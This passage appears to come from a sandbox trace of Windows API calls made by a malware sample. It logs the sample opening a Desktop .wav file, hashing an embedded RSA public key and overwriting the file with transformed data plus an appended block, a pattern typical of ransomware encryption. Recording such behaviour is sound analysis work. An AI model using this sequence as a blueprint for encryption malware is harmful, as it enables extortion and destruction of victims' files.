lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x287a1800, ftCreationTime.dwHighDateTime=0x1d8a2ff, ftLastAccessTime.dwLowDateTime=0x4b5425c0, ftLastAccessTime.dwHighDateTime=0x1d8a31b, ftLastWriteTime.dwLowDateTime=0x4b5425c0, ftLastWriteTime.dwHighDateTime=0x1d8a31b, nFileSizeHigh=0x0, nFileSizeLow=0xbe92, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="j3eSmPNiBweFL.wav", cAlternateFileName="J3ESMP~1.WAV")) returned 1 [0183.900] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d31060 [0183.900] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c6ff30 [0183.901] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d31060 | out: hHeap=0x6a0000) returned 1 [0183.901] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Desktop\\j3eSmPNiBweFL.wav") returned=".wav" [0183.901] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\j3eSmPNiBweFL.wav" (normalized: "c:\\users\\keecfmwgj\\desktop\\j3esmpnibwefl.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x584 [0183.901] GetFileSizeEx (in: hFile=0x584, lpFileSize=0x30ffb40 | out: lpFileSize=0x30ffb40*=48786) returned 1 [0183.901] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2040000 [0183.904] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0xbe6c, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0183.905] ReadFile (in: hFile=0x584, lpBuffer=0x2040000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x30ffb78, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb78*=0x26, lpOverlapped=0x0) returned 1 [0183.907] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c50 [0183.907] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0183.907] SetFilePointer (in: hFile=0x584, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0183.907] ReadFile (in: hFile=0x584, lpBuffer=0x2040000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x30ffb70, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb70*=0xbe92, lpOverlapped=0x0) returned 1 [0183.908] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0183.908] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f1) returned 0x2d32688 [0183.908] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0183.908] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0183.909] CryptAcquireContextW (in: phProv=0x30ffa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x30ffa50*=0x6ea700) returned 1 [0183.910] CryptCreateHash (in: hProv=0x6ea700, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x30ffa58 | out: phHash=0x30ffa58) returned 1 [0183.910] CryptHashData (hHash=0x2cbfa50, pbData=0x2d32688, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0183.910] CryptGetHashParam (in: hHash=0x2cbfa50, dwParam=0x2, pbData=0x0, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x30ffa54) returned 1 [0183.910] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x11) returned 0x2c44748 [0183.910] CryptGetHashParam (in: hHash=0x2cbfa50, dwParam=0x2, pbData=0x2c44748, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x2c44748, pdwDataLen=0x30ffa54) returned 1 [0183.910] GetLastError () returned 0x0 [0183.910] CryptDestroyHash (hHash=0x2cbfa50) returned 1 [0183.910] CryptReleaseContext (hProv=0x6ea700, dwFlags=0x0) returned 1 [0183.911] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d32688 | out: hHeap=0x6a0000) returned 1 [0183.911] UuidCreate (in: Uuid=0x30ffa48 | out: Uuid=0x30ffa48) returned 0x0 [0183.911] UuidToStringA (in: Uuid=0x30ffa48, StringUuid=0x30ffa40 | out: StringUuid=0x30ffa40) returned 0x0 [0183.911] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0183.911] RpcStringFreeA (in: String=0x30ffa40 | out: String=0x30ffa40) returned 0x0 [0183.911] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0183.911] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c50 [0183.911] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xbe90) returned 0x2d43778 [0183.911] SetFilePointer (in: hFile=0x584, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0183.912] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0183.912] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3f920 [0183.912] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0183.912] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3fb18 [0183.912] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9c98 [0183.912] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d31060 [0183.912] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e7e0 [0183.912] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d310a8 [0183.912] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e7f8 [0183.912] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e828 [0183.912] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e888 [0183.912] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e840 [0183.912] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x2cc0bc0 [0183.912] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x158) returned 0x2d31688 [0183.912] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x2d31688, Size=0x218) returned 0x2d3b920 [0183.912] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x558) returned 0x2d41908 [0183.912] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e828 | out: hHeap=0x6a0000) returned 1 [0183.913] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e840 | out: hHeap=0x6a0000) returned 1 [0183.913] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e888 | out: hHeap=0x6a0000) returned 1 [0183.913] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2cc0bc0 | out: hHeap=0x6a0000) returned 1 [0183.913] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d41908 | out: hHeap=0x6a0000) returned 1 [0183.914] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e888 [0183.914] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37840 [0183.914] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2c4e840 [0183.914] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c44728 [0183.914] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x9) returned 0x2c4e828 [0183.914] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378e0 [0183.914] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10e) returned 0x2c70bc8 [0183.914] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27ce8 [0183.914] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9c38 [0183.914] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c44748 [0183.914] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x104) returned 0x2c4bb80 [0183.914] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c446e8 [0183.914] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37850 [0183.914] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70bc8 | out: hHeap=0x6a0000) returned 1 [0183.914] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e840 | out: hHeap=0x6a0000) returned 1 [0183.915] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0183.915] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e828 | out: hHeap=0x6a0000) returned 1 [0183.915] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44728 | out: hHeap=0x6a0000) returned 1 [0183.915] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0183.915] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e888 | out: hHeap=0x6a0000) returned 1 [0183.915] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0183.915] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9c98 | out: hHeap=0x6a0000) returned 1 [0183.916] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3b920 | out: hHeap=0x6a0000) returned 1 [0183.916] GetCurrentThreadId () returned 0x264 [0183.916] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c70bc8 [0183.916] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x82) returned 0x6ce890 [0183.916] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x2c) returned 0x2c84d30 [0183.916] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea700 [0183.916] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x148) returned 0x2c84da8 [0183.916] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37840 [0183.916] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378e0 [0183.916] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x6d5c88 [0183.916] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0183.916] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0183.916] GetCurrentThreadId () returned 0x264 [0183.916] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0183.917] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0183.917] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xeb) returned 0x2be2220 [0183.917] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0183.917] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0183.917] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0183.917] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0183.917] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0183.918] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2be2220 [0183.918] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0183.918] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4c) returned 0x2c828a8 [0183.918] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37840 [0183.918] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x74ad40 [0183.918] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37830 [0183.918] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e888 [0183.918] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0183.918] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37830 [0183.918] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37890 [0183.918] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378a0 [0183.918] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378b0 [0183.918] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378c0 [0183.918] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37870 [0183.918] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378d0 [0183.918] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e828 [0183.918] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0183.918] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37890 [0183.918] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0183.918] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37830 [0183.918] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378f0 [0183.918] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37900 [0183.918] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37910 [0183.918] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2c4e840 [0183.919] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37900 | out: hHeap=0x6a0000) returned 1 [0183.919] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c44728 [0183.919] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378f0 | out: hHeap=0x6a0000) returned 1 [0183.919] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e810 [0183.919] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37910 | out: hHeap=0x6a0000) returned 1 [0183.919] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2c4e8a0 [0183.919] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0183.919] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37830 [0183.919] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0183.919] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e870 [0183.919] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0183.919] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e858 [0183.919] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0183.919] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2c4e8b8 [0183.919] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e858 | out: hHeap=0x6a0000) returned 1 [0183.919] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2c4e858 [0183.919] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e870 | out: hHeap=0x6a0000) returned 1 [0183.919] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378a0 [0183.919] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0183.919] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c446a8 [0183.919] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0183.919] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1c) returned 0x2d27ce8 [0183.919] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e828 | out: hHeap=0x6a0000) returned 1 [0183.919] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2c4e828 [0183.919] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0183.919] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x204) returned 0x2d2fc98 [0183.920] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e888 | out: hHeap=0x6a0000) returned 1 [0183.920] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bec8 [0183.920] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e8b8 | out: hHeap=0x6a0000) returned 1 [0183.920] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x210) returned 0x2d41908 [0183.920] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0183.920] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10c) returned 0x2c31700 [0183.920] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0183.920] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bc98 [0183.920] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e828 | out: hHeap=0x6a0000) returned 1 [0183.920] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x200) returned 0x2d41b20 [0183.920] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bec8 | out: hHeap=0x6a0000) returned 1 [0183.920] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c03ca0 [0183.921] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0183.921] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea700 | out: hHeap=0x6a0000) returned 1 [0183.921] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0183.921] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c03ca0 | out: hHeap=0x6a0000) returned 1 [0183.921] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446a8 | out: hHeap=0x6a0000) returned 1 [0183.922] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bc98 | out: hHeap=0x6a0000) returned 1 [0183.922] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d41908 | out: hHeap=0x6a0000) returned 1 [0183.922] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d41b20 | out: hHeap=0x6a0000) returned 1 [0183.922] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c31700 | out: hHeap=0x6a0000) returned 1 [0183.923] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0183.923] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e858 | out: hHeap=0x6a0000) returned 1 [0183.923] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0183.923] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e8a0 | out: hHeap=0x6a0000) returned 1 [0183.923] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44728 | out: hHeap=0x6a0000) returned 1 [0183.923] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e840 | out: hHeap=0x6a0000) returned 1 [0183.923] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e810 | out: hHeap=0x6a0000) returned 1 [0183.923] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84da8 | out: hHeap=0x6a0000) returned 1 [0183.923] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0183.924] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d5c88 | out: hHeap=0x6a0000) returned 1 [0183.924] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e7f8 | out: hHeap=0x6a0000) returned 1 [0183.924] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d310a8 | out: hHeap=0x6a0000) returned 1 [0183.924] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fc98 | out: hHeap=0x6a0000) returned 1 [0183.924] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x74ad40 | out: hHeap=0x6a0000) returned 1 [0183.925] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c828a8 | out: hHeap=0x6a0000) returned 1 [0183.925] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bb80 | out: hHeap=0x6a0000) returned 1 [0183.925] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44748 | out: hHeap=0x6a0000) returned 1 [0183.925] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0183.925] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446e8 | out: hHeap=0x6a0000) returned 1 [0183.925] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9c38 | out: hHeap=0x6a0000) returned 1 [0183.926] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3fb18 | out: hHeap=0x6a0000) returned 1 [0183.926] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0183.926] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3f920 | out: hHeap=0x6a0000) returned 1 [0183.927] WriteFile (in: hFile=0x584, lpBuffer=0x2d43778*, nNumberOfBytesToWrite=0xbe8d, lpNumberOfBytesWritten=0x30ffb14, lpOverlapped=0x0 | out: lpBuffer=0x2d43778*, lpNumberOfBytesWritten=0x30ffb14*=0xbe8d, lpOverlapped=0x0) returned 1 [0183.928] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d43778 | out: hHeap=0x6a0000) returned 1 [0183.928] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0xbe92, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0183.928] WriteFile (in: hFile=0x584, lpBuffer=0x2c70bc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2c70bc8*, lpNumberOfBytesWritten=0x30ffb50*=0x100, lpOverlapped=0x0) returned 1 [0183.929] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70bc8 | out: hHeap=0x6a0000) returned 1 [0183.929] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c6fdf8 [0183.929] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x428) returned 0x2d41908 [0183.929] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2d41908, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0183.929] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x430) returned 0x2d41d38 [0183.929] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, 